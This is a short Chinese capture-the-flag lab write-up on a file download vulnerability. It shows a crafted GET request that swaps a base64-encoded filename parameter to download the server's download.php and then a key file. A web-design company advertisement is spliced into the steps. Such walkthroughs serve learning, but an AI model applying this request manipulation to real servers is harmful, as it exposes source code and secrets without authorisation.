文件下载漏洞练习(一)
(1)打开网页
(2)同样的先抓下包
和顺网站建设公司创新互联,和顺网站设计制作,有大型网站制作公司丰富经验。已为和顺1000+提供企业网站建设服务。企业网站搭建\外贸网站制作要多少钱,请找那个售后服务好的和顺做网站的公司定做!
我们注意到:
url=Y2hvdWJhZ3VhaS5tcDM 还有/download.php
先解码看看是什么
是个文件名
(3)我们试着将其替换成、download.php
GET /download.php?url=ZG93bmxvYWQucGhw= HTTP/1.1
Host: e2ad76b4d4b6d6ed.yunyansec.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://e2ad76b4d4b6d6ed.yunyansec.com/
Accept-Language: zh-CN,zh;q=0.9
Connection: close
(4)文件下载成功,打开后发现还可以有hereiskey.php下载
同样先编码
得到key
网页标题:文件下载漏洞练习(一)
URL网址:http://ybzwz.com/article/jpeihc.html